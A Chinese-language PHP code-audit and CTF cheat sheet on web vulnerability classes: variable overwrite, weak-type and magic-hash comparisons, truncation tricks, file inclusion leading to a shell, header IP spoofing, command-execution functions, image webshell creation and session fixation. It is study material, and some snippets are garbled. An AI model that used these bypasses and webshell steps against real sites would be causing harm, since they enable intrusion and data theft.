变量覆盖
该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。条件:若有EXTR_SKIP则不行。
1 2 3 4 5 6 7 <?php $a = "Original" ; $my_array = array ("a" => "Cat" ,"b" => "Dog" , "c" => "Horse" ); extract($my_array); echo "\$a = $a; \$b = $b; \$c = $c" ;?>
这里原来是$a是original,后面通过extract把$a覆盖变成了Cat了,所以这里把原来的变量给覆盖了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php $flag='xxx' ; extract($_GET); if (isset ($shiyan)) { $content=trim(file_get_contents($flag)); if ($shiyan==$content) { echo 'ctf{xxx}' ; } else { echo 'Oh.no' ; } }
parse_str() 解析字符串并注册成变量
1 2 3 4 $b=1 ; Parse_str('b=2' ); Print_r($b);
import_request_variables()
1 2 3 4 5 6 7 8 将 GET/POST/Cookie 变量导入到全局作用域中,全局变量注册。 在5.4 之后被取消,只可在4 -4.1 .0 和5 -5.4 .0 可用。 import_request_variable("p" , "post_" ); import_request_variable("gp" , "gp_" ); import_request_variable("cg" , "cg_" );
$$变量覆盖
1 2 3 4 5 6 7 8 9 10 <? $chs = '' ; if ($_POST && $charset != 'utf-8' ){ $chs = new Chinese('UTF-8' , $charset); foreach ($_POST as $key => $value){ $$key = $chs->Convert($value); } unset ($chs); }
全局变量覆盖漏洞 原理: register_globals 是php中的一个控制选项,可以设置成off或者on, 默认为off, 决定是否将 EGPCS(Environment,GET,POST,Cookie,Server)变量注册为全局变量。 如果register_globals打开的话, 客户端提交的数据中含有GLOBALS变量名, 就会覆盖服务器上的$GLOBALS变量.
$_REQUEST 这个超全局变量的值受 php.ini中request_order的影响,在php5.3.x系列中,request_order默认值为GP,也就是说默认配置下$_REQUEST只包含$_GET和$_POST而不包括$_COOKIE。通过COOKIE就可以提交GLOBALS变量。
1 2 3 4 5 6 7 8 9 10 <?php echo $foobar;if (ini_get("register_globals" )) foreach ($_REQUEST as $k=>$v) unset (${$k});print $a;print $_GET[b];
经过测试,开了register_globals会卡死
绕过过滤的空白字符 原理:https://baike.baidu.com/item/%E6%8E%A7%E5%88%B6%E5%AD%97%E7%AC%A6
1 2 3 4 5 6 7 8 9 10 11 12 13 14 控制码 "\0" "%00" (ASCII 0 (0x00)),空字节符。 制表符 "\t" (ASCII 9 (0x09)),水平制表符。 空白字符: "\n" (ASCII 10 (0x0A)),换行符。 "\v" "\x0b" (ASCII 11 (0x0B)),垂直制表符。 "\f" "%0c" 换页符 "\r" "%0d"(ASCII 13 (0x0D)),回车符。 空格: " " "%20" (ASCII 32 (0x20)),普通空格符。
而trim过滤的空白字符有
1 string trim ( string $str [, string $character_mask = " \t\n\r\0\x0B" ] )
其中缺少了\f
2 函数对空白字符的特性 is_numeric函数在开始判断前,会先跳过所有空白字符。这是一个特性。 也就是说,is_numeirc(“ \r\n \t 1.2”)是会返回true的。同理,intval(“ \r\n \t 12”),也会正常返回12。
案例
https://github.com/bowu678/php_bugs/blob/master/02%20%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E7%9A%84%E7%A9%BA%E7%99%BD%E5%AD%97%E7%AC%A6.php
intval整数溢出 php整数上限溢出绕过intval
intval 函数最大的值取决于操作系统。 32 位系统最大带符号的 integer 范围是 -2147483648 到 2147483647。举例,在这样的系统上, intval(‘1000000000000’) 会返回 2147483647。 64 位系统上,最大带符号的 integer 值是 9223372036854775807。
intval 四舍五入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php if ($_GET[id]) {mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $id = intval($_GET[id]); $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'" )); if ($_GET[id]==1024 ) { echo "<p>no! try again</p>" ; } else { echo ($query[content]); } }
浮点数精度忽略
1 if ($req["number" ] != intval($req["number" ]))
在小数小于某个值(10^-16)以后,再比较的时候就分不清大小了。 输入number = 1.00000000000000010, 右边变成1.0, 而左与右比较会相等。
多重加密 题目中有:
1 2 $login = unserialize(gzuncompress(base64_decode($requset['token' ]))); if ($login['user' ] === 'ichunqiu' ){echo $flag;}
本地则写:
1 2 3 4 5 6 <?php $arr = array (['user' ] === 'ichunqiu' ); $token = base64_encode(gzcompress(serialize($arr))); print_r($token); ?>
截断 iconv 异常字符截断
1 2 3 4 5 $a='1' .char(130 ).'2' ; echo iconv("UTF-8" ,"gbk" ,$a); echo iconv('GB2312' , 'UTF-8' , $str);
eregi、ereg可用%00截断 功能:正则匹配过滤 条件:要求php<5.3.4
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 <?php if (isset ($_GET['password' ])) { if (ereg ("^[a-zA-Z0-9]+$" ,$_GET['password' ]) === FALSE ) { echo '<p>You password must be alphanumeric</p>' ; } else if (strlen($_GET['password' ]) < 8 && $_GET['password' ] > 9999999 ) { if (strpos ($_GET['password' ], '*-*' ) !== FALSE ) { die ('Flag: ' . $flag); } else { echo ('<p>*-* have not been found</p>' ); } } else { echo '<p>Invalid password</p>' ; } }
move_uploaded_file 用\0截断 5.4.x<= 5.4.39, 5.5.x<= 5.5.23, 5.6.x <= 5.6.7 原来在高版本(受影响版本中),PHP把长度比较的安全检查逻辑给去掉了,导致了漏洞的发生 cve:https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2348
move_uploaded_file($_FILES['x']['tmp_name'],"/tmp/test.php\x00.jpg")
上传抓包修改name为a.php\0jpg(\0是nul字符),可以看到$_FILES[‘xx’][‘name’]存储的字符串是a.php,不会包含\0截断之后的字符,因此并不影响代码的验证逻辑。 但是如果通过$_REQUEST方式获取的,则可能出现扩展名期望值不一致的情况,造成“任意文件上传”。
inclue用?截断
1 2 3 4 5 <?php $name=$_GET['name' ]; $filename=$name.'.php' ; include $filename; ?>
当输入的文件名包含URL时,问号截断则会发生,并且这个利用方式不受PHP版本限制,原因是Web服务其会将问号看成一个请求参数。 测试POC:http://127.0.0.1/test/t1.php?name=http://127.0.0.1/test/secret.txt ? 则会打开secret.txt中的文件内容。本测试用例在PHP5.5.38版本上测试通过。
系统长度截断 这种方式在PHP5.3以后的版本中都已经得到了修复。 win260个字符,linux下4*1024=4096字节
mysql长度截断 mysql内的默认字符长度为255,超过的就没了。 由于mysql的sql_mode设置为default的时候,即没有开启STRICT_ALL_TABLES选项时,MySQL对于插入超长的值只会提示warning
mysql中utf-8截断 insert into dvwa.test values (14,concat("admin",0xc1,"abc"))
写入为admin
弱类型比较 原理
比较表:http://php.net/manual/zh/types.comparisons.php
以下等式会成立
1 2 3 4 5 6 7 8 9 '' == 0 == false '123' == 123 'abc' == 0 '123a' == 123 '0x01' == 1 '0e123456789' == '0e987654321' [false ] == [0 ] == [NULL ] == ['' ] NULL == false == 0 true == 1
==、>、<的弱类型比较 这里用到了PHP弱类型的一个特性,当一个整形和一个其他类型行比较的时候,会先把其他类型转换成整型再比。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php is_numeric(@$a["a1" ])?die ("nope" ):NULL ; if (@$a["a1" ]){ var_dump($a); ($a["a1" ]>1336 )?$v1=1 :NULL ; } var_dump($v1);
switch 弱类型
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 if (isset ($_GET['x1' ])){ $x1 = $_GET['x1' ]; $x1=="1" ?die ("ha?" ):NULL ; switch ($x1) { case 0 : case 1 : $a=1 ; break ; } }
md5比较(0e相等、数组为Null)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 md5('240610708' ) md5('QNKCDZO' ) 0 e 纯数字这种格式的字符串在判断相等的时候会被认为是科学计数法的数字,先做字符串到数字的转换。md5('240610708' )==md5('QNKCDZO' ); md5('240610708' )===md5('QNKCDZO' ); 这样的对应数值还有: var_dump(md5('240610708' ) == md5('QNKCDZO' )); var_dump(md5('aabg7XSs' ) == md5('aabC9RqS' )); var_dump(sha1('aaroZmOk' ) == sha1('aaK1STfY' )); var_dump(sha1('aaO8zKZF' ) == sha1('aa3OFF9m' )); var_dump('0010e2' == '1e3' ); var_dump('0x1234Ab' == '1193131' ); var_dump('0xABCdef' == ' 0xABCdef' );
技巧:找出在某一位置开始是0e的,并包含“XXX”的字符串
1 2 3 4 5 6 7 8 9 10 11 define('FLAG' , 'pwnhub{THIS_IS_FLAG}' ); if ($_GET['s1' ] != $_GET['s2' ]&& md5($_GET['s1' ]) == md5($_GET['s2' ])) { echo "success, flag:" . FLAG;}
1 2 3 4 5 6 $name = addslashes($_POST['name' ]); $r = $db->get_row("SELECT `pass` FROM `user` WHERE `name`='{$name}'" ); if ($r['pass' ] === md5($_POST['pass' ])) {echo "success" ;}
json传数据{“key”:0} PHP将POST的数据全部保存为字符串形式,也就没有办法注入数字类型的数据了而JSON则不一样,JSON本身是一个完整的字符串,经过解析之后可能有字符串,数字,布尔等多种类型。
1 2 3 4 application/x-www-form-urlencoded multipart/form-data application/json application/xml
第一个application/x-www-form-urlencoded,是一般表单形式提交的content-type第二个,是包含文件的表单。第三,四个,分别是json和xml,一般是js当中上传的.
{“key”:”0”}
这是一个字符串0,我们需要让他为数字类型,用burp拦截,把两个双引号去掉,变成这样:
{“key”:0}
strcmp漏洞1:返回0 适用与5.3之前版本的php
int strcmp ( string $str1 , string $str2 )
// 参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。 当这个函数接受到了不符合的类型,这个函数将发生错误,但是在5.3之前的php中,显示了报错的警告信息后,将return 0,所以可以故意让其报错,则返回0,则相等了。
1 2 3 4 5 define('FLAG' , 'pwnhub{THIS_IS_FLAG}' ); if (strcmp($_GET['flag' ], FLAG) == 0 ) {echo "success, flag:" . FLAG;}
strcmp漏洞2:返回Null 修复了上面1的返回0的漏洞,即大于5.3版本后,变成返回NULL。 array和string进行strcmp比较的时候会返回一个null,因为strcmp只会处理字符串参数,如果给个数组的话呢,就会返回NULL。strcmp($c[1],$d)
strcmp漏洞3: 判断使用的是 == 而判断使用的是==,当NULL==0是 bool(true)
in_array,array_search 弱类型比较 松散比较下,任何string都等于true:
1 2 3 4 5 6 7 8 9 10 11 12 if (is_array(@$a["a2" ])){ if (count($a["a2" ])!==5 OR !is_array($a["a2" ][0 ])) die ("nope" ); $pos = array_search("ctf" , $a["a2" ]); $pos===false ?die ("nope" ):NULL ; foreach ($a["a2" ] as $key=>$val){ $val==="ctf" ?die ("nope" ):NULL ; } $v2=1 ; }
sha1() md5() 报错相等绕过(False === False) sha1()函数默认的传入参数类型是字符串型,给它传入数组会出现错误,使sha1()函数返回错误,也就是返回false md5()函数如果成功则返回已计算的 MD5 散列,如果失败则返回 FALSE。可通过传入数组,返回错误。
1 2 3 4 5 6 if ($_GET['name' ] == $_GET['password' ]) echo '<p>Your password can not be your name!</p>' ; else if (sha1($_GET['name' ]) === sha1($_GET['password' ])) die ('Flag: ' .$flag);
strpos数组NULL(Null !== False) strpos()输入数组出错返回null
1 2 3 4 5 6 7 8 9 10 11 <?php $flag = "flag" ; if (isset ($_GET['nctf' ])) { if (@ereg ("^[1-9]+$" , $_GET['nctf' ]) === FALSE ) echo '必须输入数字才行' ; else if (strpos ($_GET['nctf' ], '#biubiubiu' ) !== FALSE ) die ('Flag: ' .$flag); else echo '骚年,继续努力吧啊~' ; }
十六进制与十进制比较 == 两边的十六进制与十进制比较,是可以相等的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 <?php error_reporting(0 ); function noother_says_correct ($temp) { $flag = 'flag{test}' ; $one = ord('1' ); $nine = ord('9' ); $number = '3735929054' ; for ($i = 0 ; $i < strlen($number); $i++) { $digit = ord($temp{$i}); if ( ($digit >= $one) && ($digit <= $nine) ) { return "flase" ; } } if ($number == $temp) return $flag; } $temp = $_GET['password' ]; echo noother_says_correct($temp);
md5注入带入’or’ 原理:
1 2 3 4 md5(string,raw) raw 可选。规定十六进制或二进制输出格式: TRUE - 原始 16 字符二进制格式 FALSE - 默认。32 字符十六进制数
当md5函数的第二个参数为True时,编码将以16进制返回,再转换为字符串。而字符串’ffifdyop’的md5加密结果为'or'<trash>
其中 trash为垃圾值,or一个非0值为真,也就绕过了检测。
1 2 $sql = "SELECT * FROM admin WHERE username = admin pass = '" .md5($password,true )."'" ;
switch没有break
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php error_reporting(0 ); if (isset ($_GET['which' ])){ $which = $_GET['which' ]; switch ($which) { case 0 : case 1 : case 2 : require_once $which.'.php' ; echo $flag; break ; default : echo GWF_HTML::error('PHP-0817' , 'Hacker NoNoNo!' , false ); break ; } }
反序列化
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 <!-- index.php --> <?php require_once ('shield.php' ); $x = new Shield(); isset ($_GET['class' ]) && $g = $_GET['class' ]; if (!empty ($g)) { $x = unserialize($g); } echo $x->readfile(); ?> <img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%" /> <!-- shield.php --> <?php class Shield { public $file; function __construct ($filename = '' ) { $this -> file = $filename; } function readfile () { if (!empty ($this ->file) && stripos($this ->file,'..' )===FALSE && stripos($this ->file,'/' )===FALSE && stripos($this ->file,'\\' )==FALSE ) { return @file_get_contents($this ->file); } } } ?> <!-- showimg.php --> <?php $f = $_GET['img' ]; if (!empty ($f)) { $f = base64_decode($f); if (stripos($f,'..' )===FALSE && stripos($f,'/' )===FALSE && stripos($f,'\\' )===FALSE && stripos($f,'pctf' )===FALSE ) { readfile($f); } else { echo "File not found!" ; } } ?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <!-- answer.php --> <?php require_once ('shield.php' );$x = class Shield(); $g = serialize($x); echo $g;?> <!-- shield.php --> <?php class Shield { public $file; function __construct ($filename = 'pctf.php' ) { $this -> file = $filename; } function readfile () { if (!empty ($this ->file) && stripos($this ->file,'..' )===FALSE && stripos($this ->file,'/' )===FALSE && stripos($this ->file,'\\' )==FALSE ) { return @file_get_contents($this ->file); } } } ?>
文件包含 原理:
include()/include_once(),require()/require_once(),中的变量可控
利用过程:
1 2 3 4 5 6 上传图片(含有php代码的图片) 读文件,读php文件 包含日志文件getshell 包含/proc/self/envion文件getshell 如果有phpinfo可以包含临时文件 包含data://或php://input等伪协议(需要allow_url_include=On)
封闭协议:
1 2 3 4 5 6 7 8 9 10 11 12 file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — 查找匹配的文件路径模式 phar:// — PHP 归档 ssh2:// — Secure Shell 2 rar:// — RAR ogg:// — 音频流 expect:// — 处理交互式的流
1 2 include ('\evilservershell.php' );
提交参数无过滤 原理:过滤了GPC,但没有过滤其它部分。
1 2 3 4 5 6 7 8 9 上传文件相关变量如$_FIle $_GET ,$_POST ,$_Cookie ,$_SERVER ,$_ENV ,$_SESSION ,$_REQUEST HTTP_CLIENT_IP 和HTTP_XFORWORDFOR 中的ip不受gpc影响 $_HTTP_COOKIE_VARS $_HTTP_ENV_VARS $_HTTP_GET_VARS $_HTTP_POST_FILES $_HTTP_POST_VARS $_HTTP_SERVER_VARS
案例:
1 2 3 4 5 6 7 8 9 foreach ($_COOKIE AS $_key=>$_value){ unset ($$_key); } foreach ($_POST AS $_key=>$_value){ !ereg("^\_[A-Z]+" ,$_key) && $$_key=$_POST[$_key]; } foreach ($_GET AS $_key=>$_value){ !ereg("^\_[A-Z]+" ,$_key) && $$_key=$_GET[$_key]; }
通过表单来传值。
1 2 3 4 <form method ="post" action ="http://localhost/qibo/member/comment.php?job=ifcom" enctype ="multipart/form-data" > <input type ="file" name ="cidDB" > <input type ="submit" > </form >
这里的gid为查询参数
1 2 3 4 5 6 $_SERVER QUERY_STRING HTTP_REFERER HTTP_USER_AGENT HTTP_HOST HTTP_X_FORWARDED_FOR
伪造IP 原理: 以 HTTP_ 开头的 header, 均属于客户端发送的内容。那么,如果客户端伪造user-agent/referer/client-ip/x-forward-for,就可以达到伪造IP的目的,php5之后不受GPC影响。
1 2 3 4 5 6 7 8 9 10 11 12 13 关键字: HTTP_ getenv $_SERVER 服务端: echo getenv('HTTP_CLIENT_IP' );echo $_SERVER['REMOTE_ADDR' ]; echo $_SERVER['HTTP_CLIENT_IP' ]; echo $_SERVER['HTTP_X_FORWARDED_FOR' ]; 客户端: 注意发送的格式: CLIENT-IP:10.10 .10 .1 X-FORWARDED-FOR :10.10 .10 .10
1 2 这个玩意恒成立的。不管有没有clientip 【strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')】
绕过正则匹配 缺少^和$限定 数组绕过正则 【\A[ _a-zA-Z0-9]+\z】
str_replace路径穿越 原理 str_replace的过滤方式为其search参数数组从左到右一个一个过滤。
1 2 3 4 5 6 7 8 9 $dir = str_replace(array ('..\\' , '../' , './' , '.\\' ), '' , trim($dir),$countb); echo $dir;echo '</br>替换数量' ;echo $countb;
1 2 3 4 5 $file = str_replace(array ('../' , '\\' , '..' ), array ('' , '/' , '' ), $_GET['file' ],$counta); echo $file;echo '</br>替换数量' ;echo $counta;
short_open_tag=on 短标签 原理: 当 php.ini 的short_open_tag=on时,PHP支持短标签,默认情况下为off; 格式为:<?xxxx;?> –> <?xxx;
1 2 3 4 Go0s@ubuntu:~$ cat test.php <?="helloworld" ; Go0s@ubuntu:~$ curl 127.0.0.1/test.php helloworld
file_put_contents第二个参数传入数组 原理:
1 2 3 file_put_contents(file,data,mode,context) file 必需。规定要写入数据的文件。如果文件不存在,则创建一个新文件。 data 可选。规定要写入文件的数据。可以是字符串、数组或数据流。如果是数组的话,将被连接成字符串再进行写入。
1 2 3 4 5 6 7 <?php $a = $_GET['data' ]; $file = $_GET['filename' ]; $current = file_get_contents($file); file_put_contents($file, $a);
单引号和双引号 原理:单引号或双引号都可以用来定义字符串。但只有双引号会调用解析器。
1 2 3 4 5 6 7 8 9 10 11 12 13 $s = "I am a 'single quote string' inside a double quote string" ; $s = 'I am a "double quote string" inside a single quote string' ; $s = "I am a 'single quote string' inside a double quote string" ; $s = 'I am a "double quote string" inside a single quote string' ; $abc='I love u' ; echo $abc echo '$abc' echo "$abc" $a="${@phpinfo()}" ; <?php $a="${@phpinfo()}" ;?>
查询语句缺少单引号
1 2 3 4 "Select * from table where id=$id" "Select * from table where id=" .$id." limit 1" "Select * from table where id='$id'" "Select * from table where id='" .$id."' limit 1"
宽字符注入 原理 常见转码函数: iconv() mb_convert_encoding() addslashes 防御: 用mysql_real_escape_string
1 2 3 4 5 $pwd = addslashes($pwd); mysql_query("SET NAMES gbk" ); $query = "select * from user where uname='" .$uname."' and pwd='" .$pwd."'" ;
跳转无退出 原理: 没有使用return()或die()或exit()退出流程的话,下面的代码还是会继续执行。可以使用burp测试,不会跳转过去。
1 2 3 4 $this ->myclass->notice('alert("系统已安装过");window.location.href="' .site_url().'";' );header("location: ../index.php" );
二次编码注入 由于浏览器的一次urldecode,再由服务器端函数的一次decode,造成二次编码,而绕过过滤。 如%2527,两次urldecode会最后变成’
1 2 3 4 5 6 7 8 base64_decode -- 对使用 MIME base64 编码的数据进行解码 base64_encode -- 使用 MIME base64 对数据进行编码 rawurldecode -- 对已编码的 URL 字符串进行解码 rawurlencode -- 按照 RFC 1738 对 URL 进行编码 urldecode -- 解码已编码的 URL 字符串 urlencode -- 编码 URL 字符串 unserialize/serialize 字符集函数(GKB,UTF7/8...)如iconv()/mb_convert_encoding()等
前端可控变量填充导致XSS 当html里的链接是变量时,易出现XSS。
1 2 ={#、echo、print、printf、vprintf、<%=$test% > img scr={#$list.link_logo#}
命令执行函数
1 2 3 4 5 6 7 8 9 10 11 12 system() exec() passthru() pcntl_exec() shell_exec() echo `whoami`; popen()和proc_open() array_map($arr,$array); popen('whoami >>D: /2.txt' , 'r' ); preg_replace() ob_start() array_map()
防范方法: 使用自定义函数或函数库来替代外部命令的功能 使用escapeshellarg 函数来处理命令参数 使用safe_mode_exec_dir 指定可执行文件的路径
create_function create_function构造了一个return后面的语句为一个函数。
1 2 3 4 5 6 7 8 9 <?php $sort_by=$_GET['sort_by' ]; $sorter='strnatcasecmp' ; $databases=array ('test' ,'test' ); $sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);' ; usort($databases, create_function('$a, $b' , $sort_function));
mb_ereg_replace()的/e模式 原理
1 2 3 mb_ereg_replace()是支持多字节的正则表达式替换函数,函数原型如下: string mb_ereg_replace ( string $pattern , string $replacement , string $string [, string $option= "msr" ] ) 当指定mb_ereg(i)_replace()的option参数为e时,replacement参数[在适当的逆向引用替换完后]将作为php代码被执行.
preg_replace /e模式执行命令
1 2 3 4 preg_replace("/\[(.*)]/e" ,'\\1' ,$_GET['str' ]);
动态函数执行
1 2 call_user_func call_user_func_array
1 2 call_user_func($_GET['a' ],$b);
代码执行
1 2 3 4 assert() call_user_func() call_user_func_array() create_function()
eval()和assert()代码执行 当assert()的参数为字符串时 可执行PHP代码。 区别:assert可以不加;,eval不可以不加;。
1 2 eval (" phpinfo(); " );【√】 eval (" phpinfo() " );【X】assert(" phpinfo(); " );【√】 assert(" phpinfo() " );【√】
优先级绕过 原理: 如果运算符优先级相同,那运算符的结合方向决定了该如何运算http://php.net/manual/zh/language.operators.precedence.php
优先级:&&/|| 大于 = 大于 AND/OR
1 2 3 4 5 6 $test = true and false ; var_dump($test); $test2 = true && false ; var_dump($test2); $test3 = is_numeric("123" ) and is_numeric("anything false" ); var_dump($test3);
getimagesize图片判断绕过 原理: 当用getimagesize判断文件是否为图片,可以判断的文件为gif/png/jpg,如果指定的文件如果不是有效的图像,会返回 false。 只要我们在文件头部加入GIF89a后可以上传任意后缀文件。
生成小马图的方法:
1 cat image.png webshell.php > image.php
1 2 3 4 5 6 7 8 9 10 11 12 13 $file = $request->getFiles(); if (getimagesize($files['users' ]['photo' ]['tmp_name' ])) { move_uploaded_file($files['users' ]['photo' ]['tmp_name' ], $filename); $filesize = @getimagesize('/path/to/image.png' ); if ($filesize) { do_upload(); }
<变*,windows findfirstfile利用 原理: Windows下,在搜索文件的时候使用了FindFirstFile这一个winapi函数,该函数到一个文件夹(包含子文件夹)去搜索指定文件。 执行过程中,字符”>”被替换成”?”,字符”<”被替换成”*”,而符号”(双引号)被替换成一个”.”字符。 所以:
“>””>>”可代替一个字符,”<”可以代替后缀多个字符,”<<”可以代替包括文件名和后缀多个字符。所以一般使用<<
“ 可以代替.
文件名第一个字符是”.”的话,读取时可以忽略之
NO
Status
Function
Type of operation
1.
OK
include()
Includefile
2.
OK
include_once()
Includefile
3.
OK
require()
Includefile
4.
OK
require_once()
Include file
5.
OK
fopen()
Openfile
6.
OK
ZipArchive::open()
Archive file
7.
OK
copy()
Copyfile
8.
OK
file_get_contents()
Readfile
9.
OK
parse_ini_file()
Readfile
10.
OK
readfile()
Readfile
11.
OK
file_put_contents()
Write file
12.
OK
mkdir()
New directory creation
13.
OK
tempnam()
New file creation
14.
OK
touch()
New file creation
15.
OK
move_uploaded_file()
Move operation
16.
OK
opendiit)
Directory operation
17.
OK
readdir()
Directory operation
18.
OK
rewinddir()
Directory operation
19.
OK
closedir()
Directory operation
20.
FAIL
rename()
Move operation
21.
FAIL
unlink()
Delete file
22.
FAIL
rmdir())
Directory operation
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 文件名为1. txt 文件名为1234. txt include ('shell<' ); include ('shell<<' );include ('shell.p>p' ); include ('shell"php' );fopen('.htacess' ); file_get_contents('C:boot.ini' ); file_get_contents('C:/tmp/con.jpg' ); file_put_contents('C:/tmp/con.jpg' ,chr(0 ×07 ));
处理value没有处理key foreach时,addslashes对获得的value值进行处理,但没有处理key。
用来目录遍历的特别函数 http://wooyun.webbaozi.com/bug_detail.php?wybug_id=wooyun-2014-088094 lstat 函数
http://wooyun.webbaozi.com/bug_detail.php?wybug_id=wooyun-2014-088071 stream_resolve_include_path函数
http://wooyun.webbaozi.com/bug_detail.php?wybug_id=wooyun-2014-083688
http://wooyun.webbaozi.com/bug_detail.php?wybug_id=wooyun-2014-083457
http://wooyun.webbaozi.com/bug_detail.php?wybug_id=wooyun-2014-083453
绕过GD库图片渲染 jpg_payload.zip
jpg_name.jpg是待GD处理的图片
1 php jpg_payload.php <jpg_name.jpg>
生成好的图片,在经过如下代码处理后,依然能保留其中的shell:
1 2 3 <?php imagecreatefromjpeg('xxxx.jpg' ); ?>
会话固定
1 if (!empty ($_GET['phpsessid' ])) session_id($_GET['phpsessid' ]);
通过get方法来设置session。所以可以通过CSRF:
http://xxxx/index.php?r=admin/index/index&phpsessid=f4cking123
管理员点了我们就能使用此session进后台了。
资料 PHP代码审计分段讲解
https://github.com/bowu678/php_bugs
https://github.com/jiangsir404/Audit-Learning
https://read.douban.com/reader/ebook/16642056/